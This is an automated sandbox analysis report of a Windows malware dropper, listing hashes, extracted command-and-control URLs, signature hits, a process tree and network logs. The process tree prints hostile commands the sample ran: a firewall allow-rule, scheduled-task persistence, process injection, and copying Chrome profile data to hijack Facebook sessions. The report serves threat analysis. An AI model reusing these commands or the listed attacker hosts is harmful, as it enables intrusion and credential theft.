Resubmissions
submitted              analysis ID         score
04/10/2024, 18:01 UTC  241004-wl132axhpm   10
22/04/2024, 20:52 UTC  240422-znvwksgb77   10
27/02/2024, 22:40 UTC  240227-2lykssdc83   10
03/01/2024, 09:53 UTC  240103-lw3dqscehj   10
29/12/2023, 23:48 UTC  231229-3txtxadcb8   10

Analysis
max time kernel: 1s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29/12/2023, 23:48 UTC
Static task: static1

Behavioral task: behavioral1
Sample: 078192e792b12a8d9980f364e110155c.exe
Resource: win7-20231215-en

Behavioral task: behavioral2
Sample: 078192e792b12a8d9980f364e110155c.exe
Resource: win10v2004-20231215-en
General
Target: 078192e792b12a8d9980f364e110155c.exe
Size: 8.7MB
MD5: 078192e792b12a8d9980f364e110155c
SHA1: 89596e27530eeccd6ad9644aa045e8e0499301a1
SHA256: 67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33
SHA512: 72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc
SSDEEP: 196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J
Malware Config

Extracted: smokeloader
  pub2

Extracted: ffdroider
  http://186.2.171.3

Extracted: metasploit
  windows/single_exec

Extracted: socelars
  http://www.iyiqian.com/
  http://www.xxhufdc.top/
  http://www.uefhkice.xyz/
  http://www.fcektsy.top/

Extracted: smokeloader
  2020
  http://aucmoney.com/upload/
  http://thegymmum.com/upload/
  http://atvcampingtrips.com/upload/
  http://kuapakualaman.com/upload/
  http://renatazarazua.com/upload/
  http://nasufmutlu.com/upload/

Extracted: raccoon
  1.7.3
  92be0387873e54dd629b9bfa972c3a9a88e6726c
  url4cnc: https://t.me/gishsunsetman
Signatures

Detect Fabookie payload (2 IoCs)
  resource | yara_rule
  behavioral2/files/0x00080000000231e0-24.dat | family_fabookie
  behavioral2/files/0x00080000000231e0-29.dat | family_fabookie

FFDroider payload (3 IoCs)
  resource | yara_rule
  behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp | family_ffdroider
  behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp | family_ffdroider
  behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp | family_ffdroider

Glupteba payload (9 IoCs)
  resource | yara_rule
  behavioral2/memory/452-189-0x0000000005240000-0x0000000005B66000-memory.dmp | family_glupteba
  behavioral2/memory/452-192-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/452-198-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/452-202-0x0000000005240000-0x0000000005B66000-memory.dmp | family_glupteba
  behavioral2/memory/5320-240-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/5320-272-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/1376-1421-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/1376-1441-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/1376-1998-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3748 | 4968 | rUNdlL32.eXe | 103

Raccoon Stealer V1 payload (4 IoCs)
  resource | yara_rule
  behavioral2/memory/6644-1347-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1
  behavioral2/memory/6644-1348-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1
  behavioral2/memory/6644-1352-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1
  behavioral2/memory/6644-1350-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars payload (2 IoCs)
  resource | yara_rule
  behavioral2/files/0x00060000000231e7-42.dat | family_socelars
  behavioral2/files/0x00060000000231e7-50.dat | family_socelars

Nirsoft (3 IoCs)
  resource | yara_rule
  behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp | Nirsoft
  behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp | Nirsoft
  behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp | Nirsoft

Modifies Windows Firewall (1 TTPs, 1 IoCs)
  pid | Process
  5700 | netsh.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | 078192e792b12a8d9980f364e110155c.exe

Executes dropped EXE (2 IoCs)
  pid | Process
  3068 | Files.exe
  1196 | KRSetp.exe

YARA matches: upx
  resource | yara_rule
  behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp | upx
  behavioral2/memory/3348-179-0x0000000000400000-0x000000000045B000-memory.dmp | upx
  behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp | upx
  behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp | upx

YARA matches: vmprotect
  resource | yara_rule
  behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect
  behavioral2/memory/3616-127-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect
  behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect
  behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect

Adds Run key to start application (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" | Files.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  9 | ip-api.com
  11 | ipinfo.io
  13 | ipinfo.io
  21 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (2 IoCs)
  pid | pid_target | Process | procid_target
  1608 | 3372 | WerFault.exe | 110
  5800 | 2340 | WerFault.exe | 96

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  3228 | schtasks.exe

GoLang User-Agent (1 IoCs)
Uses default user-agent string defined by GoLang HTTP packages.
  description | flow | ioc
  HTTP User-Agent header | 87 | Go-http-client/1.1

Kills process with taskkill (1 IoCs)
  pid | Process
  3480 | taskkill.exe

Suspicious use of WriteProcessMemory (5 IoCs)
  description | pid | Process | procid_target
  PID 712 wrote to memory of 3068 | 712 | 078192e792b12a8d9980f364e110155c.exe | 91
  PID 712 wrote to memory of 3068 | 712 | 078192e792b12a8d9980f364e110155c.exe | 91
  PID 712 wrote to memory of 3068 | 712 | 078192e792b12a8d9980f364e110155c.exe | 91
  PID 712 wrote to memory of 1196 | 712 | 078192e792b12a8d9980f364e110155c.exe | 94
  PID 712 wrote to memory of 1196 | 712 | 078192e792b12a8d9980f364e110155c.exe | 94
Processes
(process tree; children are indented under their parent, signatures in square brackets)

C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe (PID 712) [Checks computer location settings; Suspicious use of WriteProcessMemory]
  cmdline: "C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"
    C:\Users\Admin\AppData\Local\Temp\Files.exe (PID 3068) [Executes dropped EXE; Adds Run key to start application]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (PID 3348)
          cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (PID 5216)
          cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    C:\Users\Admin\AppData\Local\Temp\KRSetp.exe (PID 1196) [Executes dropped EXE]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
    C:\Users\Admin\AppData\Local\Temp\Install_Files.exe (PID 2900)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"
    C:\Users\Admin\AppData\Local\Temp\pub2.exe (PID 2340)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
        C:\Windows\SysWOW64\WerFault.exe (PID 5800) [Program crash]
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 368
    C:\Users\Admin\AppData\Local\Temp\Complete.exe (PID 1580)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Complete.exe"
    C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe (PID 3616)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2432)
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3400)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xe0,0xe4,0xd8,0xdc,0x7ff9592046f8,0x7ff959204708,0x7ff959204718
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2112)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3060)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3864)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3256)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2036)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5516)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5500)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5596)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5588)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6128)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6120)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4816)
          cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 /prefetch:2
    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 1648)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
        C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 6644)
          cmdline: C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
        C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 6636)
          cmdline: C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
        C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 6628)
          cmdline: C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    C:\Users\Admin\AppData\Local\Temp\Info.exe (PID 452)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Info.exe"
        C:\Users\Admin\AppData\Local\Temp\Info.exe (PID 5320)
          cmdline: "C:\Users\Admin\AppData\Local\Temp\Info.exe"
            C:\Windows\system32\cmd.exe (PID 5916)
              cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            C:\Windows\rss\csrss.exe (PID 1376)
              cmdline: C:\Windows\rss\csrss.exe /94-94
                C:\Windows\SYSTEM32\schtasks.exe (PID 3228) [Creates scheduled task(s)]
                  cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe (PID 2824)
                  cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
    C:\Users\Admin\AppData\Local\Temp\Folder.exe (PID 1164)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
    C:\Users\Admin\AppData\Local\Temp\Install.exe (PID 2316)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        C:\Windows\SysWOW64\cmd.exe (PID 5168)
          cmdline: cmd.exe /c taskkill /f /im chrome.exe
            C:\Windows\SysWOW64\taskkill.exe (PID 3480) [Kills process with taskkill]
              cmdline: taskkill /f /im chrome.exe
        C:\Windows\SysWOW64\xcopy.exe (PID 1324)
          cmdline: xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
        C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5864)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5992)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1764)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2796)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2216 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2132)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4784)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1412)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3528 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5952)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3344 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6352)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6096)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3584 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6052)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
            C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6856)
              cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Folder.exe (PID 1116)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a

C:\Windows\System32\CompPkgSrv.exe (PID 1548)
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\rundll32.exe (PID 3372)
  cmdline: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    C:\Windows\SysWOW64\WerFault.exe (PID 1608) [Program crash]
      cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 604

C:\Windows\System32\CompPkgSrv.exe (PID 684)
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe (PID 2992)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3372 -ip 3372

C:\Windows\system32\rUNdlL32.eXe (PID 3748) [Process spawned unexpected child process]
  cmdline: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Windows\SysWOW64\WerFault.exe (PID 5768)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2340 -ip 2340

C:\Windows\system32\netsh.exe (PID 5700) [Modifies Windows Firewall]
  cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5892)
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff95b8b9758,0x7ff95b8b9768,0x7ff95b8b9778

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe (PID 1804)
  cmdline: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
Network

Remote address: 8.8.8.8:53
  Request:  19.177.190.20.in-addr.arpa IN PTR
  Response: (empty)

Remote address: 8.8.8.8:53
  Request:  158.240.127.40.in-addr.arpa IN PTR
  Response: (empty)

Remote address: 8.8.8.8:53
  Request:  ip-api.com IN A
  Response: ip-api.com IN A 208.95.112.1

Remote address: 8.8.8.8:53
  Request:  ip-api.com IN A

Remote address: 8.8.8.8:53
  Request:  www.listincode.com IN A
  Response: www.listincode.com IN A 199.59.243.225

Remote address: 8.8.8.8:53
  Request:  ipinfo.io IN A
  Response: ipinfo.io IN A 34.117.186.192

Remote address: 8.8.8.8:53
  Request:  95.221.229.192.in-addr.arpa IN PTR
  Response: (empty)

Remote address: 8.8.8.8:53
  Request:  95.221.229.192.in-addr.arpa IN PTR

Remote address: 8.8.8.8:53
  Request:  95.221.229.192.in-addr.arpa IN PTR

Remote address: 8.8.8.8:53
  Request:  192.186.117.34.in-addr.arpa IN PTR
  Response: 192.186.117.34.in-addr.arpa IN PTR 192.186.117.34.bc.googleusercontent.com

Remote address: 8.8.8.8:53
  Request:  music-sec.xyz IN A
  Response: (empty)

Remote address: 8.8.8.8:53
  Request:  iplogger.org IN A
  Response: iplogger.org IN A 172.67.132.113
            iplogger.org IN A 104.21.4.208
Remote address: 208.95.112.1:80
Request:
GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com
Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 313
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
